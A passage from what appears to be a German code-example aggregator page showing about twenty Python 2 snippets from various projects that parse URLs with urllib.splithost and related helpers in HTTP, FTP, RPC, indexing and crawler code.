         (host,port) = urllib.splitnport(hostport, 443)
         connexion = HTTPSConnection(host, port)
         if self.proxy_host != None and self.proxy_port != None :
             connexion.http_proxy = [self.proxy_host,
                                     self.proxy_port]
     else:
         assert False, "Unhandled Protocol, please use HTTP or HTTPS"
     
         
     connexion.connect()
     connexion.request(method, path, body=data, headers=headers)
     response = connexion.getresponse()
     
     return response

Beispiel #31

0

Datei anzeigen

 def get_domian(url):
     if not url.startswith('http'):
         url = 'http://' + url
     proto, rest = urllib.splittype(url)
     res, rest = urllib.splithost(rest)
     return None if not res else res

Beispiel #32

0

Datei anzeigen

 def __init__(self, url, method, params):
     Assert(method == 'GET')
     netloc, path = splithost(url)
     if not netloc: raise IOError, ('ftp error', 'no host given')
     host, port = splitport(netloc)
     user, host = splituser(host)
     if user: user, passwd = splitpasswd(user)
     else: passwd = None
     host = socket.gethostbyname(host)
     if port:
         try:
             port = string.atoi(port)
         except string.atoi_error:
             raise IOError, ('ftp error', 'bad port')
     else:
         port = ftplib.FTP_PORT
     path, attrs = splitattr(path)
     self.url = "ftp://%s%s" % (netloc, path)
     dirs = string.splitfields(path, '/')
     dirs, file = dirs[:-1], dirs[-1]
     self.content_length = None
     if not file:
         self.content_type, self.content_encoding = None, None
         type = 'd'
     else:
         self.content_type, self.content_encoding = app.guess_type(file)
         if self.content_encoding:
             type = 'i'
         elif self.content_type and self.content_type[:5] == 'text/':
             type = 'a'
         elif file[-1] == '/':
             type = 'd'
         else:
             type = 'i'
     if dirs and not dirs[0]: dirs = dirs[1:]
     key = (user, host, port, string.joinfields(dirs, '/'))
     self.debuglevel = None
     try:
         if not ftpcache.has_key(key):
             ftpcache[key] = []
         for attr in attrs:
             [attr, value] = map(string.lower, splitvalue(attr))
             if attr == 'type' and value in ('a', 'i', 'd'):
                 type = value
             elif attr == 'debug':
                 try:
                     self.debuglevel = string.atoi(value)
                 except string.atoi_error:
                     pass
         candidates = ftpcache[key]
         for cand in candidates:
             if not cand.busy():
                 break
         else:
             cand = ftpwrapper(user, passwd, host, port, dirs,
                               self.debuglevel)
             candidates.append(cand)
         # XXX Ought to clean the cache every once in a while
         self.cand = cand
         self.sock, self.isdir = cand.retrfile(file, type)
         self.content_length = cand.content_length
     except ftplib.all_errors, msg:
         raise IOError, ('ftp error', msg)

Beispiel #33

0

Datei anzeigen

    def do_open(self, http_class, req):
        data = req.get_data()
        v_files = []
        v_vars = []
        # mapping object (dict)
        if req.has_data() and type(data) != str:
            if hasattr(data, 'items'):
                data = data.items()
            else:
                try:
                    if len(data) and not isinstance(data[0], tuple):
                        raise TypeError
                except TypeError:
                    ty, va, tb = sys.exc_info()
                    raise TypeError, "not a valid non-string sequence or mapping object", tb

            for (k, v) in data:
                # if fd is provided with a filename
                if isinstance(v, dict):
                    if not v.has_key('fd'):
                        raise TypeError(
                            "if value is dict, it must have keys 'fd' and 'filename"
                        )
                    if not v.has_key('filename'):
                        raise TypeError(
                            "if value is dict, it must have keys 'fd' and 'filename"
                        )
                    v_files.append((k, v))
                elif hasattr(v, 'read'):
                    v_files.append((k, v))
                else:
                    v_vars.append((k, v))
        # no file ? convert to string
        if len(v_vars) > 0 and len(v_files) == 0:
            data = urllib.urlencode(v_vars)
            v_files = []
            v_vars = []
        host = req.get_host()
        if not host:
            raise urllib2.URLError('no host given')
        h = http_class(host)  # will parse host:port
        if req.has_data():
            h.putrequest(req.get_method(), req.get_selector())
            if not 'Content-type' in req.headers:
                if len(v_files) > 0:
                    boundary = mimetools.choose_boundary()
                    l = send_data(v_vars, v_files, boundary)
                    h.putheader('Content-Type',
                                'multipart/form-data; boundary=%s' % boundary)
                    h.putheader('Content-length', str(l))
                else:
                    h.putheader('Content-type',
                                'application/x-www-form-urlencoded')
                    if not 'Content-length' in req.headers:
                        h.putheader('Content-length', '%d' % len(data))
        else:
            h.putrequest(req.get_method(), req.get_selector())

        scheme, sel = urllib.splittype(req.get_selector())
        sel_host, sel_path = urllib.splithost(sel)
        h.putheader('Host', sel_host or host)
        for name, value in self.parent.addheaders:
            name = name.capitalize()
            if name not in req.headers:
                h.putheader(name, value)
        for k, v in req.headers.items():
            h.putheader(k, v)
        # httplib will attempt to connect() here.  be prepared
        # to convert a socket error to a URLError.
        try:
            h.endheaders()
        except socket.error, err:
            raise urllib2.URLError(err)

Beispiel #34

0

Datei anzeigen

Datei: yijuhua.py Projekt: xietalent/eval

def url_www(url): #URL地址中提取网址  http://www.bizschool.cn/plus/90sec.php        www.bizschool.cn
    proto, rest = urllib.splittype(url)
    host, rest = urllib.splithost(rest)
    return host

Beispiel #35

0

Datei anzeigen

Datei: urllib2.py Projekt: connoryang/1v1dec

 def get_host(self):
     if self.host is None:
         self.host, self.__r_host = splithost(self.__r_type)
         if self.host:
             self.host = unquote(self.host)
     return self.host

Beispiel #36

0

Datei anzeigen

Datei: getcontent.py Projekt: bill4aus/autoreply

        # searchinput=browser.find_element_by_css_selector('#kw')
        # searchinput.send_keys(msgstring)
        # searchinput.send_keys(Keys.DOWN)
        # time.sleep(2)
        browserquit()
        browserquit()
        browserquit()

        url = urlinfo['url']
        classtext = urlinfo['classtext']
        classtext = classtext.replace("[", "")
        classtext = classtext.replace("]", "")
        classtext = classtext.replace("\n", "")

        protocol, s1 = urllib.splittype(url)
        host, s2 = urllib.splithost(s1)
        host, port = urllib.splitport(host)

        print('host')
        print(host)

        print(classtext)
        print(type(classtext))

        # 浏览器设置

        service_args = []
        dcap = {}
        #从USER_AGENTS列表中随机选一个浏览器头，伪装浏览器
        uainfo = generate_user_agent(os=('mac', 'win'))
        print(type(uainfo))

Beispiel #37

0

Datei anzeigen

    def testAdd(self, filepath, urlDic, root):
        config = IndexWriterConfig(Version.LUCENE_CURRENT, self.getAnalyzer())
        config.setOpenMode(IndexWriterConfig.OpenMode.CREATE_OR_APPEND)
        writer = IndexWriter(self.dir, config)

        t1 = FieldType()
        t1.setIndexed(False)
        t1.setStored(True)
        t1.setTokenized(False)

        t2 = FieldType()
        t2.setIndexed(True)
        t2.setStored(False)
        t2.setTokenized(True)
        t2.setIndexOptions(FieldInfo.IndexOptions.DOCS_AND_FREQS_AND_POSITIONS)

        t3 = FieldType()
        t3.setIndexed(True)
        t3.setStored(True)
        t3.setTokenized(False)

        path = os.path.join(root, filepath)

        url = urlDic[filepath]
        proto, rest = urllib.splittype(url)
        site, rest = urllib.splithost(rest)

        file = open(path)
        contents = file.read()
        file.close()

        soup = BeautifulSoup(contents, features='html.parser')
        title = soup.title.string
        title = unicode(title).encode('utf-8')
        title = title.replace("\n", '')

        contents = soup.get_text().encode('utf-8')
        seg_list = jieba.cut(contents)
        contents = " ".join(seg_list)

        doc = Document()
        doc.add(Field("name", filepath, t1))
        doc.add(Field("path", path, t1))
        doc.add(Field("title", title, t1))
        doc.add(Field("url", url, t1))
        doc.add(Field("site", site, t3))
        if len(contents) > 0:
            doc.add(Field("contents", contents, t2))
        else:
            print "warning: no content in %s" % filepath
        #True，建立新索引，False，建立增量索引
        # file = open(filepath)
        # contents = unicode(file.read(), 'gbk')
        # file.close()
        # doc = Document()
        # doc.add(Field("name", os.path.basename(filepath),
        #                      Field.Store.YES,
        #                      Field.Index.NOT_ANALYZED))
        # doc.add(Field("path", filepath,
        #                      Field.Store.YES,
        #                      Field.Index.NOT_ANALYZED))
        # if len(contents) > 0:
        #     title = self.getTxtAttribute(contents, 'Title')
        #     author = self.getTxtAttribute(contents, 'Author')
        #     language = self.getTxtAttribute(contents, 'Language')
        #     doc.add(Field("Title", title,
        #                          Field.Store.YES,
        #                          Field.Index.ANALYZED))
        #     doc.add(Field("Author", author,
        #                          Field.Store.YES,
        #                          Field.Index.ANALYZED))
        #     doc.add(Field("Language", language,
        #                          Field.Store.YES,
        #                          Field.Index.ANALYZED))
        #     doc.add(Field("contents", contents,
        #                          Field.Store.NO,
        #                          Field.Index.ANALYZED))
        # else:
        #     print "warning: no content in %s" % filename
        writer.addDocument(doc)
        writer.close()

Beispiel #38

0

Datei anzeigen

 def getUrlInfo(self, url):
     host = urllib.splithost(urllib.splittype(url)[1])[0]
     host, port = urllib.splitport(host)
     if port:
         port = int(port)
     return host, port

Beispiel #39

0

Datei anzeigen

    def do_open(self, http_class, req):
        data = req.get_data()
        v_files = []
        v_vars = []
        # mapping object (dict)
        if req.has_data() and type(data) != str:
            if hasattr(data, u'items'):  #$NON-NLS-1$
                data = data.items()
            else:
                try:
                    if len(data) and not isinstance(data[0], tuple):
                        raise TypeError
                except TypeError:
                    ty, va, tb = sys.exc_info()  #@UnusedVariable
                    raise TypeError, u"not a valid non-string sequence or mapping object", tb  #$NON-NLS-1$

            for (k, v) in data:
                if hasattr(v, u'read'):  #$NON-NLS-1$
                    v_files.append((k, v))
                else:
                    v_vars.append((k, v))
        # no file ? convert to string
        if len(v_vars) > 0 and len(v_files) == 0:
            data = urllib.urlencode(v_vars)
            v_files = []
            v_vars = []
        host = req.get_host()
        if not host:
            raise urllib2.URLError(u'no host given')  #$NON-NLS-1$

        h = http_class(host)  # will parse host:port
        if req.has_data():
            h.putrequest(u'POST', req.get_selector())  #$NON-NLS-1$
            if not u'Content-type' in req.headers:  #$NON-NLS-1$
                if len(v_files) > 0:
                    boundary = mimetools.choose_boundary()
                    l = send_data(v_vars, v_files, boundary)
                    h.putheader(
                        u'Content-Type',  #$NON-NLS-1$
                        u'multipart/form-data; boundary=%s' %
                        boundary)  #$NON-NLS-1$
                    h.putheader(u'Content-length', str(l))  #$NON-NLS-1$
                else:
                    h.putheader(
                        u'Content-type',  #$NON-NLS-1$
                        u'application/x-www-form-urlencoded')  #$NON-NLS-1$
                    if not u'Content-length' in req.headers:  #$NON-NLS-1$
                        h.putheader(u'Content-length', u'%d' %
                                    len(data))  #$NON-NLS-2$ #$NON-NLS-1$
        else:
            h.putrequest(u'GET', req.get_selector())  #$NON-NLS-1$

        scheme, sel = urllib.splittype(req.get_selector())  #@UnusedVariable
        sel_host, sel_path = urllib.splithost(sel)  #@UnusedVariable
        h.putheader(u'Host', sel_host or host)  #$NON-NLS-1$
        for name, value in self.parent.addheaders:
            name = name.capitalize()
            if name not in req.headers:
                h.putheader(name, value)
        for k, v in req.headers.items():
            h.putheader(k, v)
        # httplib will attempt to connect() here.  be prepared
        # to convert a socket error to a URLError.
        try:
            h.endheaders()
        except socket.error, err:
            raise urllib2.URLError(err)

Beispiel #40

0

Datei anzeigen

def split_url(url):
    '''Splits a url into (uri_scheme, host[:port], path)'''
    scheme, remainder = urllib.splittype(url)
    host, path = urllib.splithost(remainder)
    return scheme.lower(), host, path

Beispiel #41

0

Datei anzeigen

 def register_http_handler(self, name, url, method='POST'):
     logger = self.__get_or_create_logger__(name)
     try:
         host, path = urllib.splithost(url[url.index(':') + 1:])
     except IndexError, emsg:
         raise LoggerError('Error parsing URL %s: %s' % (url, emsg))

Beispiel #42

0

Datei anzeigen

Datei: httpclient.py Projekt: vascool/virtaal

    def __init__(self, url, method='GET', data=None, headers=None,
            headers_only=False, user_agent=None, follow_location=False,
            force_quiet=True):
        GObjectWrapper.__init__(self)
        self.result = StringIO.StringIO()
        self.result_headers = StringIO.StringIO()

        if isinstance(url, unicode):
            self.url = url.encode("utf-8")
        else:
            self.url = url
        self.method = method
        self.data = data
        self.headers = headers
        self.status = None

        # the actual curl request object
        self.curl = pycurl.Curl()
        if (logging.root.level == logging.DEBUG and not force_quiet):
            self.curl.setopt(pycurl.VERBOSE, 1)

        self.curl.setopt(pycurl.WRITEFUNCTION, self.result.write)
        self.curl.setopt(pycurl.HEADERFUNCTION, self.result_headers.write)
        # We want to use gzip and deflate if possible:
        self.curl.setopt(pycurl.ENCODING, "") # use all available encodings
        self.curl.setopt(pycurl.URL, self.url)

        # let's set the HTTP request method
        if method == 'GET':
            self.curl.setopt(pycurl.HTTPGET, 1)
        elif method == 'POST':
            self.curl.setopt(pycurl.POST, 1)
        elif method == 'PUT':
            self.curl.setopt(pycurl.UPLOAD, 1)
        else:
            self.curl.setopt(pycurl.CUSTOMREQUEST, method)
        if data:
            if method == "PUT":
                self.data = StringIO.StringIO(data)
                self.curl.setopt(pycurl.READFUNCTION, self.data.read)
                self.curl.setopt(pycurl.INFILESIZE, len(self.data.getvalue()))
            else:
                self.curl.setopt(pycurl.POSTFIELDS, self.data)
                self.curl.setopt(pycurl.POSTFIELDSIZE, len(self.data))
        if headers:
            self.curl.setopt(pycurl.HTTPHEADER, headers)
        if headers_only:
            self.curl.setopt(pycurl.HEADER, 1)
            self.curl.setopt(pycurl.NOBODY, 1)
        if user_agent:
            self.curl.setopt(pycurl.USERAGENT, user_agent)
        if follow_location:
            self.curl.setopt(pycurl.FOLLOWLOCATION, 1)

        if libproxy:
            for proxy in proxy_factory.getProxies(self.url):
                # if we connect to localhost (localtm) with proxy specifically
                # set to direct://, libcurl connects fine, but then asks
                #   GET http://localhost:55555/unit/en/af/whatever
                # instead of
                #   GET /unit/en/af/whatever
                # and it doesn't work. We have to set it specifically to ""
                # though, otherwise it seems to fall back to environment
                # variables.
                if proxy == "direct://":
                    proxy = ""
                self.curl.setopt(pycurl.PROXY, proxy)
                #only use the first one
                break
        else:
            # Proxy: let's be careful to isolate the protocol to ensure that we
            # support the case where http and https might use different proxies
            split_url = self.url.split('://', 1)
            if len(split_url) > 1:
                #We were able to get a protocol
                protocol, address = split_url
                host, _path = urllib.splithost('//' + address)
                proxies = urllib.getproxies()
                if protocol in proxies and not urllib.proxy_bypass(host):
                    self.curl.setopt(pycurl.PROXY, proxies[protocol])

        # self reference required, because CurlMulti will only return
        # Curl handles
        self.curl.request = self

Beispiel #43

0

Datei anzeigen

 def _new_req_body(self):
     type, tmpuri = urllib.splittype(self._redirected)
     site, handler = urllib.splithost(tmpuri)
     return handler

Beispiel #44

0

Datei anzeigen

Datei: taskspider.py Projekt: zx273983653/WDScanner

def reptile(base_url):
    try:
        urlall_list = []
        page_list = []
        global hash
        file = './logspider/' + hash + '/urllog.txt'
        urllog = open(file, 'a+')
        urlall = './logspider/' + hash + '/urlall.txt'
        temp = open(urlall, 'a+')
        temp.close()
        urls = open(urlall, 'r+')
        for url in urls.readlines():
            urlall_list.append(url.strip('\n'))

        if not len(base_url):
            print "No page to reptile!"
            sys.exit(1)

        parser = MyParser()

        if base_url.startswith("http"):
            myopen = urllib2.urlopen
        else:
            myopen = open

        try:
            content = myopen(base_url).read()
        except:
            print "Failed to read from %s." % base_url
            print sys.exc_info()
            return 0
        # print content

        for item in content:
            parser.feed(item)

        for tmp in parser.links:
            page_list.append(tmp.get("link"))

        # global title
        # title = parser.title
        parser.close()
        item_list = list(set(page_list))

        proto, rest = urllib.splittype(base_url)
        host, rest = urllib.splithost(rest)
        if base_url[0:4] == 'http':
            base_domain = proto + '://' + host
        elif base_url[0:3] == 'www':
            base_domain = base_url.split('/')[0]
        else:
            base_domain = base_url

        wm = WorkManager(20)
        for item in item_list:
            pos = item.find('#')
            if pos != -1:
                item = item[:pos]

            if not item.startswith("http"):
                item = base_domain + '/' + item
                pass

            # print urlall_list
            if item not in urlall_list:
                urls.write(item + '\n')
                urlall_list.append(item)
            else:
                continue
            print item
            wm.add_job(check, item, base_url, urllog)
        wm.start()
        wm.wait_for_complete()

        urllog.close()
        urls.close()
    except:
        return False

Beispiel #45

0

Datei anzeigen

Datei: util.py Projekt: mattxbart/xhtml2pdf

    def __init__(self, uri, basepath=None):
        self.basepath = basepath
        self.mimetype = None
        self.file = None
        self.data = None
        self.uri = None
        self.local = None
        self.tmp_file = None
        uri = uri or str()
        if type(uri) != str:
            uri = uri.decode("utf-8")
        log.debug("FileObject %r, Basepath: %r", uri, basepath)

        # Data URI
        if uri.startswith("data:"):
            m = _rx_datauri.match(uri)
            self.mimetype = m.group("mime")
            self.data = base64.decodestring(m.group("data"))

        else:
            # Check if we have an external scheme
            if basepath and not urlparse.urlparse(uri).scheme:
                urlParts = urlparse.urlparse(basepath)
            else:
                urlParts = urlparse.urlparse(uri)

            log.debug("URLParts: %r", urlParts)

            if urlParts.scheme == 'file':
                if basepath and uri.startswith('/'):
                    uri = urlparse.urljoin(basepath, uri[1:])
                urlResponse = urllib2.urlopen(uri)
                self.mimetype = urlResponse.info().get("Content-Type",
                                                       '').split(";")[0]
                self.uri = urlResponse.geturl()
                self.file = urlResponse

            # Drive letters have len==1 but we are looking
            # for things like http:
            elif urlParts.scheme in ('http', 'https'):

                # External data
                if basepath:
                    uri = urlparse.urljoin(basepath, uri)

                #path = urlparse.urlsplit(url)[2]
                #mimetype = getMimeType(path)

                # Using HTTPLIB
                server, path = urllib.splithost(uri[uri.find("//"):])
                if uri.startswith("https://"):
                    conn = httplib.HTTPSConnection(server)
                else:
                    conn = httplib.HTTPConnection(server)
                conn.request("GET", path)
                r1 = conn.getresponse()
                # log.debug("HTTP %r %r %r %r", server, path, uri, r1)
                if (r1.status, r1.reason) == (200, "OK"):
                    self.mimetype = r1.getheader("Content-Type",
                                                 '').split(";")[0]
                    self.uri = uri
                    if r1.getheader("content-encoding") == "gzip":
                        import gzip
                        try:
                            import cStringIO as io
                        except:
                            try:
                                import StringIO as io
                            except ImportError:
                                import io

                        self.file = gzip.GzipFile(mode="rb",
                                                  fileobj=io.StringIO(
                                                      r1.read()))
                    else:
                        self.file = r1
                else:
                    try:
                        urlResponse = urllib2.urlopen(uri)
                    except urllib2.HTTPError:
                        return
                    self.mimetype = urlResponse.info().get("Content-Type",
                                                           '').split(";")[0]
                    self.uri = urlResponse.geturl()
                    self.file = urlResponse

            else:

                # Local data
                if basepath:
                    uri = os.path.normpath(os.path.join(basepath, uri))

                if os.path.isfile(uri):
                    self.uri = uri
                    self.local = uri
                    self.setMimeTypeByName(uri)
                    self.file = open(uri, "rb")

Beispiel #46

0

Datei anzeigen

    def _request(self, methodname, params):
        """ Call a method on the remote server
            we can handle redirections. """
        # the loop is used to handle redirections
        redirect_response = 0
        retry = 0

        self._reset_host_handler_and_type()

        while 1:
            if retry >= MAX_REDIRECTIONS:
                raise InvalidRedirectionError(
                      "Unable to fetch requested Package")

            # Clear the transport headers first
            self._transport.clear_headers()
            for k, v in self._headers.items():
                self._transport.set_header(k, v)

            self._transport.add_header("X-Info",
                'RPC Processor (C) Red Hat, Inc (version %s)' %
                self.rpc_version)
            # identify the capability set of this client to the server
            self._transport.set_header("X-Client-Version", 1)

            if self._allow_redirect:
                # Advertise that we follow redirects
                #changing the version from 1 to 2 to support backward compatibility
                self._transport.add_header("X-RHN-Transport-Capability",
                    "follow-redirects=3")

            if redirect_response:
                self._transport.add_header('X-RHN-Redirect', '0')
                if self.send_handler:
                    self._transport.add_header('X-RHN-Path', self.send_handler)

            request = self._req_body(self._strip_characters(params), methodname)

            try:
                response = self._transport.request(self._host, \
                                self._handler, request, verbose=self._verbose)
                save_response = self._transport.response_status
            except xmlrpclib.ProtocolError, pe:
                if self.use_handler_path:
                    raise
                else:
                     save_response = pe.errcode

            self._redirected = None
            retry += 1
            if save_response == 200:
                # exit redirects loop and return response
                break
            elif save_response not in (301, 302):
                # Retry pkg fetch
                 self.use_handler_path = 1
                 continue
            # rest of loop is run only if we are redirected (301, 302)
            self._redirected = self._transport.redirected()
            self.use_handler_path = 0
            redirect_response = 1

            if not self._allow_redirect:
                raise InvalidRedirectionError("Redirects not allowed")

            if self._verbose:
                print "%s redirected to %s" % (self._uri, self._redirected)

            typ, uri = urllib.splittype(self._redirected)

            if typ != None:
                typ = typ.lower()
            if typ not in ("http", "https"):
                raise InvalidRedirectionError(
                    "Redirected to unsupported protocol %s" % typ)

            #
            # We forbid HTTPS -> HTTP for security reasons
            # Note that HTTP -> HTTPS -> HTTP is allowed (because we compare
            # the protocol for the redirect with the original one)
            #
            if self._type == "https" and typ == "http":
                raise InvalidRedirectionError(
                    "HTTPS redirected to HTTP is not supported")

            self._host, self._handler = urllib.splithost(uri)
            if not self._handler:
                self._handler = "/RPC2"

            # Create a new transport for the redirected service and
            # set up the parameters on the new transport
            del self._transport
            self._transport = self.default_transport(typ, self._proxy,
                                     self._username, self._password)
            self.set_progress_callback(self._progressCallback)
            self.set_refresh_callback(self._refreshCallback)
            self.set_buffer_size(self._bufferSize)
            self.setlang(self._lang)

            if self._trusted_cert_files != [] and \
                hasattr(self._transport, "add_trusted_cert"):
                for certfile in self._trusted_cert_files:
                    self._transport.add_trusted_cert(certfile)

Beispiel #47

0

Datei anzeigen

Datei: androidbuild.py Projekt: msisov/chromium68

def SplitAbUrl(ab_url):
    """Splits an ab://... URL into its fields.

  The URL has the following format:
    ab://android-build/<branch>/<target>/<build_id>/<filepath>

  The "android-build" part is the <host> or <bucket> and for now is required to
  be the literal "android-build" (we reserve it to extend the URL format in the
  future.)

  <branch> is the git branch and <target> is the board name plus one of -user
  or -userdebug or -eng or such. <build_id> is the numeric identifier of the
  build. Finally, <filepath> is the path to the artifact itself.

  The two last components (<build_id> and <filepath>) may be absent from the
  URL. An ab:// URL without a <branch> or <target> is invalid (for now.)

  Args:
    ab_url: An ab://... URL.

  Returns:
    A 4-tuple: branch, target, build_id, filepath. The two last components will
    be set to None if they are absent from the URL. The returned <build_id>
    component will be an integer, all others will be strings.

  Raises:
    ValueError: If the URL is not a valid ab://... URL.
  """
    # splittype turns 'ab://bucket/path' into ('ab', '//bucket/path').
    protocol, remainder = urllib.splittype(ab_url)
    if protocol != 'ab':
        raise ValueError('URL [%s] must start with ab:// protocol.' % ab_url)

    # splithost turns '//bucket/path' into ('bucket', '/path').
    bucket, remainder = urllib.splithost(remainder)
    if bucket != 'android-build':
        raise ValueError('URL [%s] must use "android-build" bucket.' % ab_url)

    # Split the remaining fields of the path.
    parts = remainder.split('/', 4)

    if len(parts) < 3:
        raise ValueError(
            'URL [%s] is too short and does not specify a target.' % ab_url)

    # First field will be empty.
    assert parts[0] == ''
    branch = urllib.unquote(parts[1])
    target = urllib.unquote(parts[2])

    if not branch:
        raise ValueError('URL [%s] has an empty branch.' % ab_url)

    if not target:
        raise ValueError('URL [%s] has an empty target.' % ab_url)

    # Check if build_id is present. If present, it must be numeric.
    if len(parts) > 3:
        build_id_str = urllib.unquote(parts[3])
        if not build_id_str.isdigit():
            raise ValueError(
                'URL [%s] has a non-numeric build_id component [%s].' %
                (ab_url, build_id_str))
        build_id = int(build_id_str)
    else:
        build_id = None

    # Last, use the remainder of the URL as the filepath.
    if len(parts) > 4:
        filepath = urllib.unquote(parts[4])
    else:
        filepath = None

    return (branch, target, build_id, filepath)

Beispiel #48

0

Datei anzeigen

Datei: twitter.py Projekt: zhoushuqiang/PyCrawler

def get_video_play_page(tweet_id):
    video_play_url = "https://twitter.com/i/videos/tweet/%s" % tweet_id
    video_play_response = net.http_request(video_play_url,
                                           method="GET",
                                           cookies_list=COOKIE_INFO)
    result = {
        "video_url": None,  # 视频地址
    }
    if video_play_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(
            crawler.request_failre(video_play_response.status))
    # 包含m3u8文件地址的处理
    # https://video.twimg.com/ext_tw_video/749759483224600577/pu/pl/DzYugRHcg3WVgeWY.m3u8
    m3u8_file_url = tool.find_sub_string(video_play_response.data,
                                         "&quot;video_url&quot;:&quot;",
                                         ".m3u8&quot;")
    if m3u8_file_url:
        m3u8_file_url = m3u8_file_url.replace("\\/", "/") + ".m3u8"
        file_url_protocol, file_url_path = urllib.splittype(m3u8_file_url)
        file_url_host = urllib.splithost(file_url_path)[0]
        m3u8_file_response = net.http_request(m3u8_file_url, method="GET")
        if m3u8_file_response.status != net.HTTP_RETURN_CODE_SUCCEED:
            raise crawler.CrawlerException(
                "m3u8文件 %s 解析失败，%s" %
                (m3u8_file_url,
                 crawler.request_failre(m3u8_file_response.status)))
        # 是否包含的是m3u8文件（不同分辨率）
        include_m3u8_file_list = re.findall("(/[\S]*.m3u8)",
                                            m3u8_file_response.data)
        if len(include_m3u8_file_list) > 0:
            # 生成最高分辨率视频所在的m3u8文件地址
            m3u8_file_url = "%s://%s%s" % (file_url_protocol, file_url_host,
                                           include_m3u8_file_list[-1])
            m3u8_file_response = net.http_request(m3u8_file_url, method="GET")
            if m3u8_file_response.status != net.HTTP_RETURN_CODE_SUCCEED:
                raise crawler.CrawlerException(
                    "最高分辨率m3u8文件 %s 解析失败，%s" %
                    (m3u8_file_url,
                     crawler.request_failre(m3u8_file_response.status)))
        # 包含分P视频文件名的m3u8文件
        ts_url_find = re.findall("(/[\S]*.ts)", m3u8_file_response.data)
        if len(ts_url_find) == 0:
            raise crawler.CrawlerException(
                "m3u8文件截取视频地址失败\n%s\n%s" %
                (m3u8_file_url, m3u8_file_response.data))
        result["video_url"] = []
        for ts_file_path in ts_url_find:
            result["video_url"].append(
                "%s://%s%s" %
                (file_url_protocol, file_url_host, str(ts_file_path)))
    else:
        # 直接包含视频播放地址的处理
        video_url = tool.find_sub_string(video_play_response.data,
                                         "&quot;video_url&quot;:&quot;",
                                         "&quot;")
        if video_url:
            result["video_url"] = video_url.replace("\\/", "/")
        else:
            # 直接包含视频播放地址的处理
            vmap_file_url = tool.find_sub_string(
                video_play_response.data, "&quot;vmap_url&quot;:&quot;",
                "&quot;")
            if not vmap_file_url:
                raise crawler.CrawlerException("页面截取视频播放地址失败\n%s" %
                                               video_play_response.data)
            vmap_file_url = vmap_file_url.replace("\\/", "/")
            vmap_file_response = net.http_request(vmap_file_url, method="GET")
            if vmap_file_response.status != net.HTTP_RETURN_CODE_SUCCEED:
                raise crawler.CrawlerException(
                    "视频播放页 %s 解析失败\n%s" %
                    (vmap_file_url,
                     crawler.request_failre(vmap_file_response.status)))
            video_url = tool.find_sub_string(vmap_file_response.data,
                                             "<![CDATA[", "]]>")
            if not video_url:
                raise crawler.CrawlerException(
                    "视频播放页 %s 截取视频地址失败\n%s" %
                    (vmap_file_url, video_play_response.data))
            result["video_url"] = str(video_url.replace("\\/", "/"))
    return result

Beispiel #49

0

Datei anzeigen

def protocol_access(url, mode, params, data=None):
    scheme, resturl = splittype(url)
    if not scheme:
        raise IOError, ("protocol error", "no scheme identifier in URL", url)
    scheme = string.lower(scheme)
    sanitized = re.sub("[^a-zA-Z0-9]", "_", scheme)
    #
    # Check first to see if proxies are enabled
    manual_proxy_enabled = grailutil.pref_or_getenv('manual_proxy_enabled',
                                                    type_name='int')

    app = grailutil.get_grailapp()
    if manual_proxy_enabled:
        proxy_name = sanitized + "_proxy"
        if manual_proxy_enabled == -1:
            #
            # We should only get here when there are no user preferences
            # for proxies, which should only happen once... so check the
            # environment for the rest of the known scheme proxy env vars
            # and load them into prefs if they exist.
            app.prefs.Set('proxies', 'manual_proxy_enabled', 0)
            proxy = None
            for next_proxy_name in VALID_PROXIES:
                next_proxy = grailutil.pref_or_getenv(next_proxy_name,
                                                      check_ok=VALID_PROXIES)
                if next_proxy:
                    app.prefs.Set('proxies', 'manual_proxy_enabled', 1)

                if next_proxy_name == proxy_name:
                    proxy = next_proxy

            no_proxy_enabled = grailutil.pref_or_getenv('no_proxy_enabled',
                                                        type_name='int')
            if no_proxy_enabled == -1:
                no_proxy = grailutil.pref_or_getenv('no_proxy')
            if no_proxy:
                app.prefs.Set('proxies', 'no_proxy_enabled', 1)
            else:
                app.prefs.Set('proxies', 'no_proxy_enabled', 0)
        else:
            proxy = grailutil.pref_or_getenv(proxy_name,
                                             check_ok=VALID_PROXIES)
    else:
        proxy = None

    if proxy:
        if not valid_proxy(proxy):
            error = 'Invalid proxy: ' + proxy
            raise IOError, error
        no_proxy_enabled = grailutil.pref_or_getenv('no_proxy_enabled',
                                                    type_name='int')
        if no_proxy_enabled:
            no_proxy = grailutil.pref_or_getenv('no_proxy')
        else:
            no_proxy = None

        do_proxy = 1
        if no_proxy:
            list = map(string.strip, string.split(no_proxy, ","))
            url_host, url_remains = splithost(resturl)
            url_host = string.lower(url_host or '')
            if proxy_exception(url_host, list):
                do_proxy = 0
            else:
                url_host, url_port = splitport(url_host)
                if proxy_exception(url_host, list):
                    do_proxy = 0
        if do_proxy:
            proxy_scheme, proxy_resturl = splittype(proxy)
            proxy_host, proxy_remains = splithost(proxy_resturl)
            resturl = (proxy_host, url)
            scheme = string.lower(proxy_scheme)
            sanitized = re.sub("[^a-zA-Z0-9]", "_", scheme)


##          print "Sending", url
##          print "     to", scheme, "proxy", proxy_host
    modname = sanitized + "API"
    app = grailutil.get_grailapp()
    ext = app.find_extension('protocols', sanitized)
    if ext:
        access = ext.access
    else:
        access = None
    if not access:
        raise IOError, ("protocol error", "no class for %s" % scheme)
    try:
        if data:
            return access(resturl, mode, params, data)
        else:
            return access(resturl, mode, params)
    except socket.error, msg:
        raise IOError, ("socket error", msg)

Beispiel #50

0

Datei anzeigen

Datei: urllib2_file.py Projekt: sgricci/digsby

def do_request_(self, request):
    host = request.get_host()
    if not host:
        raise URLError('no host given')

    data = request.get_data()
    v_files = []
    v_vars = []
    if request.has_data() and not isinstance(data, str):  #POST
        if hasattr(data, 'items'):
            data = data.items()
        else:
            try:
                if len(data) and not isinstance(data[0], tuple):
                    raise TypeError
            except TypeError:
                _ty, _va, tb = sys.exc_info()
                try:
                    raise TypeError, "not a valid non-string sequence or mapping object: %r" % type(
                        data), tb
                finally:
                    del tb
        for (k, v) in data:
            if hasattr(v, 'read'):
                v_files.append((k, v))
            else:
                v_vars.append((k, v))
        boundary = mimetools.choose_boundary()
        request.boundary = boundary
        request.v_files = v_files
        request.v_vars = v_vars
    # no file ? convert to string
    if len(v_vars) > 0 and len(v_files) == 0:
        request.data = data = urllib.urlencode(v_vars)
        v_files[:] = []
        v_vars[:] = []

    if request.has_data():
        if not 'Content-type' in request.headers:
            if len(v_files) > 0:
                l = send_data(v_vars, v_files, boundary)
                request.add_unredirected_header(
                    'Content-Type',
                    'multipart/form-data; boundary=%s' % boundary)
